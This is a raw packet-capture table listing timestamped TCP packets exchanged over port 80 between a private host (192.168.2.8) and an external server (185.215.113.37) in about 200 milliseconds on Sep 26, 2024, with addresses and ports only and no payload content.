Sep 26, 2024 06:00:12.880578995 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.880592108 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.880604029 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.880604029 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.880616903 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.880621910 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.880651951 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.880676031 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.917568922 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.917622089 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.917632103 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.917649984 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.917685032 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.917685032 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.917785883 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.917804956 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.917818069 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.917831898 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.917836905 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.917845011 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.917856932 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.917856932 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.917870045 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.917882919 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.917896032 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.917896032 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.917908907 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.917917967 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.917927027 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.917937994 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.917958021 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.917960882 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.917968988 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.917979956 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.917985916 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.918004990 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.918008089 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.918020010 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.918030977 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.918040037 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.918070078 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.918167114 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.918179035 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.918190956 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.918205023 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.918216944 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.918216944 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.918227911 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.918241978 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.918246984 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.918256044 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.918270111 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.918277979 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.918282032 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.918294907 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.918296099 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.918319941 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.918338060 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.927691936 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.927716017 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.927726984 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.927797079 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.927798033 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.927808046 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.927819014 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.927819967 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.927831888 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.927846909 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.927855968 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.927881956 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.927897930 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.928037882 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.928049088 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.928060055 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.928071022 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.928083897 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.928083897 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.928097010 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.928109884 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.928111076 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.928138018 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.928153038 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.965835094 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.965858936 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.965909004 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.965909004 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.965945959 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.965958118 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.965979099 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.965986013 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.965991020 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966001987 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966002941 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.966016054 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.966020107 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966034889 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.966041088 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966048956 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.966053009 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966068029 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966068029 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.966087103 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.966088057 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966100931 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.966108084 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966119051 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966120958 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.966130972 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966134071 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.966140985 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966155052 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.966155052 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966169119 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966190100 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966192007 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.966204882 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966216087 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966221094 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.966228962 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966255903 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.966270924 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.966274023 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966284990 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966295004 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966320038 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.966321945 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966336012 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966336012 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.966348886 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966358900 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.966365099 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966372967 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.966373920 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966404915 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.966406107 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966415882 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966417074 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.966428041 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966447115 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.966449976 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966461897 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966464043 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.966474056 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966486931 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966497898 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.966500044 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966511011 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966516972 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.966548920 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.966579914 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966592073 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966609955 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966620922 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.966620922 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966649055 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.966666937 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966671944 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.966677904 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966690063 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966710091 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.966722965 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.966743946 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966767073 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966782093 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966792107 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.966793060 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966805935 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966820002 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.966820002 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966835022 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966846943 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966851950 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.966866016 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.966878891 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966881037 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.966888905 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966900110 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966911077 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966921091 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.966923952 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966936111 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.966938972 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.966972113 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.966980934 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.967010975 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.967021942 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.967041016 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.967051983 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.967055082 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.967062950 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.967076063 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.967088938 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.967101097 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.967108011 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.967120886 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.967133045 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.967133999 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.967147112 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.967148066 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.967159033 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.967165947 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.967173100 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.967185974 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.967186928 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.967199087 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.967212915 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.967228889 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:12.967231989 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.967258930 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:12.967269897 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.010489941 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.010503054 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.010514021 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.010535002 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.010545969 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.010555983 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.010557890 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.010570049 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.010576963 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.010585070 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.010591030 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.010608912 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.010627031 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.010689020 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.010701895 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.010713100 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.010719061 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.010725021 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.010734081 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.010735989 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.010750055 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.010761976 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.010761976 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.010776043 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.010786057 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.010791063 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.010798931 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.010804892 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.010834932 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.010838032 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.010853052 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.010864973 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.010879040 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.010880947 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.010890961 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.010905981 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.010909081 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.010917902 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.010936975 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.010951996 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.010977983 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.014504910 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.014517069 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.014528990 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.014549971 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.014558077 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.014563084 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.014575958 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.014584064 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.014614105 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.014620066 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.014626980 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.014647007 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.014657974 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.014657974 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.014673948 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.014687061 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.014698982 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.014719009 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.014729977 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.014730930 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.014744043 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.014754057 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.014760017 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.014790058 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.052645922 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.052683115 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.052694082 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.052793026 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.052803993 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.052818060 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.052824974 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.052824974 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.052829981 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.052843094 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.052855015 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.052855015 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.052865982 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.052871943 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.052903891 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.052937031 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.052948952 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.052962065 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.052973986 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.052978992 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.052987099 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053009033 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.053035021 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053040028 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.053047895 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053059101 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053069115 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053077936 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.053087950 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053102016 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053106070 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.053112984 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053133011 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053133965 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.053143978 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053155899 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053162098 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.053168058 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053180933 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053194046 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053199053 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.053208113 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053208113 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.053220987 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053231001 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053241968 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.053247929 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053270102 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053272009 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.053281069 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053283930 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.053292990 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053306103 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053318024 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053318977 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.053337097 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.053359032 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053361893 CEST	49704	80	192.168.2.8	185.215.113.37
